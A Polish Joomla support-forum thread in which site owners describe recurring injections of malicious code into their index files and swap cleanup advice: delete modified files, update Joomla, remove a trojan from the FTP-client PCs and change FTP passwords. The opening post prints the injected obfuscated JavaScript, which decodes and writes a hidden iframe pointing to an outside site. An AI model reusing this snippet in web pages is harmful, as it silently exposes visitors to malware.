Witam wszystkich, od 2 dni walczę z jakimś botem, który wkleja mi do plików index fragment kodu, co od strony frontowej wskazuje na trojana malvare, pewnie ten kod przekierowuje na jakąś stronę z trojanem, w sumie chmody mam ustawione wg instrukcji, Joomla też zaktualizowana do 1,5,9, komponentów niebezpiecznych nie instalowałem. Widzę, że problem nie dotyczy tylko mnie http://www.grupy.egospodarka.pl/mallware-doklejajacy-zdalnie-kod-do-stron,t,364960,8.html Nie wiem co mogę jeszcze zabezpieczyć? Poniżej doklejany kod


<!-- 1234392148 --><!-- ad --><script language="JavaScript">function rkfg(jflq){return String.fromCharCode(jflq);}var ohhe="06010510211409710910103211511409906103910411611611 20580470471151171121011141051111140971001220461051 10102111047111112105115047063116061049051039032119 10510011610406103904803903210410110510310411606103 90480390321151161211081010610391181051151050981051 08105116121058032104105100100101110059039062060047 105102114097109101062";var ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3){ifdm+=rkfg(ohhe.substr (qhxk, 3));}window.status='Done';document.write(ifdm);*** ********
<!-- /ad -->

To nie żaden bot, tylko zhakowana witryna
http://www.pomoc.joomla.pl/component/option,com_easyfaq/task,cat/catid,75/Itemid,53/

PS przewalcz metodycznie = bo to świństwo siedzi Ci prawdopodobnie w dziesiątkach plików index.php oraz index.html

Mam niestety to samo w 1.0.12.
Od kilku dni z tym walczę... co dziwne strony postawione na tym samym silniku i wersji na innych serwerach nie zostały zhakowane.

Jak teraz to wyczyścić ?
Mam około 10 serwisów ( najczęściej na 1.0.12 ) i w każdym z nich występują codziennie kilka razy włamania i podmienianie index.php w głównym katalogu serwisu ( nie w szablonie ) tzn. dopisywanie skryptu ********** tutaj złośliwy kod z odnośnikiem do dvcd.info ***********

Pomocy co zrobić gdy już coś takiego zaistniało :)

Po pierwsze, wyszukać wszystkie zmodyfikowane pliki i je usunąć
Po drugie, zaktualizować Joomla do 1.0.15

Ok gdy serwis jest "standardowy".
Niestety w jednym z serwisów mam integrację z foum smf ( pełną tzn działa jako komponent, rejestracja użytkowników jest przez joomla ale działa również w smf ) , zmieniłem komponent rejestracji i dużo mniejszych poprawek o których już nie pamiętam... no ale... spróbuję to przenieść na 1.0.15.

Jest jakiś patch 1.0.12 do 1.0.15 ?

trzy dni temu miałem to samo ale udało mi sie to usunąć

W problemie, który opisałem w pierwszym poście samo usuwanie szkodliwego kodu nic nie zmienia gdyż pojawia się po jakimś czasie na nowo. Konieczne jest usunięcie trojana z komputera lub komputerów na których jest dostęp FTP. Z tym, ze niektóre programy antywirusowe nawet te z górnej półki z aktualnymi szczepionkami nie wykrywają tego jako trojan. Udało mi się usunąć najnowszą wersją Kasperskyego. Konieczna jest także zmiana hasła do FTP bo inaczej po jakimś czasie znowu napłynie i nie jest to wina jakiejś dziury w kodzie Joomli bo dotyczy to także stron wykonanych w zwykłym htmlu.

własnie wyczytałem w jednym z postów Pawła Frankowskiego na GL, ze warto zrobic backup plików i sprawdzić je avastem no i ze swojej strony oczywiscie popwieram zmiane hasła, co zreszta jest opisane w pomoc.joomla.pl

Właśnie przerabiałem to avastem i to z najnowszymi szczepionkami i do końca sobie z tym nie poradził, być może już teraz są aktualizacje, które sobie z tym radzą dlatego musiałem użyć Kasperskyego, który sobie poradził. Wiem, że u znajomego był taki sam problem z kolei miał Esseta i F-secuer i też nie dało rady.
Z tego co się orientuję problem z tym trojanem doklejającym kod się rozszerza i coraz więcej osób to łapie więc trzeba uważać żeby nie dostać tego paskudztwa z pocztą e-mail bo z tego co wiem programy serwerowe nawet u dobrych providerów zaczynają mieć z tym problemy aby odwirusowywać bezpośrednio na serwerze.